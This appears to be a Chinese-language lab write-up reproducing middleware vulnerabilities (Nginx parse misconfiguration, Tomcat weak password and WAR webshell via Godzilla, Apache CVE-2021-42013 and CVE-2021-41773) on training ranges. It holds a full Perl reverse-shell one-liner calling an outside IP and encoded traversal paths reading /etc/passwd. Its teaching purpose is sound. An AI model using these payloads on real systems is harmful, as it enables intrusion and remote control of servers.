服务攻防测试流程:
案例演示:Nginx 解析漏洞复现
该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞
使用vulhub靶场复现
启动环境,访问地址,发现是一个文件上传功能
上传一个带有脚本代码的图片
上传成功,访问图片地址,
脚本代码没有被解析
在图片地址后面加上"/.php"图片就可以被当作脚本文件解析执行
案例演示:中间件Tomcat7+ 弱密码和后端 Getshell 漏洞
漏洞产生:配置不当导致后台弱口令,可通过上传jsp压缩包改名的war拿shell
工具哥斯拉:https://github.com/BeichenDream/Godzilla
使用vulhub靶场,启动环境
打开网站,点击Manager APP登录tomcat后台,猜测弱口令为:用户名 tomcat密码tomcat
成功进入后台
使用工具哥斯拉生成jsp文件
将生成的jsp文件压缩,然后将压缩文件后缀更改为war
来到tomcat后台的war上传功能,上传2.war文件
上传成功之后会在tomcat后台生成一个以上传的压缩文件名来命名的目录
点击访问这个目录,在后面加上我们的jsp文件名就是后门连接路径
来到哥斯拉点击目标——添加填写后门地址等信息
点击测试链接,如果测试成功就点击添加。对添加的目标右键——进入
进入命令执行终端,成功获取shell
来到文件管理模块还可以看到我们的脚本文件
案例演示:apache 远程代码执行 (CVE-2021-42013)
影响版本:Apache 2.4.49 和 Apache 2.4.50
打开vulfocus靶场,启动漏洞环境,打开漏洞地址
抓取post数据包
服务器监听5566端口
更改数据包,
将访问路径更改为:/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
将传递参数更改为:
echo;perl-e 'use Socket;$i="43.134.241.193";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
放包,服务器成功获取shell
案例演示:Apache路径穿越漏洞(CVE-2021-41773)
影响版本:Apache 2.4.49 和 Apache 2.4.50
打开vulfocus靶场,启动漏洞环境,打开漏洞地址
查看页面元素可知服务版本为Apache/2.4.50 (Unix),说明大概率存在漏洞
抓取漏洞地址数据包
将访问路径更改为:/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd因为是Unix系统,所以敏感信息在/etc/passwd下,放包成功获取数据
原文始发于微信公众号(小黑子安全):中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论